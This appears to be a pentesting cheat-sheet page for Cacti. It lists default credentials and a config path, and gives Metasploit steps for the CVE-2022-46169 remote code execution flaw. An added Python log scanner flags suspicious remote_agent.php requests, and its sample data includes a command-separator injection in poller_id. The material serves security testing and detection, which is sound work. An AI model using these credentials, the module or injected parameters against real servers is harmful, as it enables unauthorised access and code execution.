# Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
admin:admin
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
/include/config.php
```

### Remote Code Execution (RCE) CVE-2022-46169 <a href="#remote-code-execution-rce-cve-2022-46169" id="remote-code-execution-rce-cve-2022-46169"></a>

Reference: <https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/>

```shellscript
msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run
```

See also the [Exploit DB](https://www.exploit-db.com/exploits/51166) entry.
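To check web server logs for attempts against this CVE, the following added example (not part of the original page or of Cacti) flags requests to `remote_agent.php` whose `poller_id` is not a plain integer or whose peer address is not a known poller. The endpoint and parameter names come from the public advisory for CVE-2022-46169; the poller allowlist, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: addresses of your legitimate remote pollers (constructed value).
KNOWN_POLLERS = {ipaddress.ip_address("192.0.2.10")}

# Combined log format: peer address, timestamp, method, request target.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2023:10:00:01 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&local_data_ids[]=6&host_id=1&poller_id=1 HTTP/1.1" 200 54',
    '198.51.100.7 - - [10/Jan/2023:10:02:13 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&local_data_ids[]=6&host_id=1&poller_id=1%3BPLACEHOLDER'
    ' HTTP/1.1" 200 54',
    '198.51.100.7 - - [10/Jan/2023:10:02:20 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&local_data_ids[]=1&host_id=1&poller_id=1 HTTP/1.1" 200 54',
    '203.0.113.5 - - [10/Jan/2023:10:05:00 +0000] "GET /cacti/graph_view.php'
    ' HTTP/1.1" 200 5120',
]

def classify(line):
    """Return a finding dict for a suspicious remote_agent.php hit, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    peer, ts, _method, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/remote_agent.php"):
        return None
    reasons = []
    # parse_qs percent-decodes values, so encoded metacharacters are visible.
    params = parse_qs(url.query, keep_blank_values=True)
    if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("poller_id", [])):
        reasons.append("non-numeric poller_id")
    # The log's peer field is the TCP source, not a client-supplied header.
    try:
        known = ipaddress.ip_address(peer) in KNOWN_POLLERS
    except ValueError:
        known = False
    if not known:
        reasons.append("peer is not a known poller")
    return {"peer": peer, "time": ts, "reasons": reasons} if reasons else None

def scan(lines):
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings appear in access logs, so this does not see parameters sent in a request body.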

### References <a href="#references" id="references"></a>

* [Pentest Tools](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169)
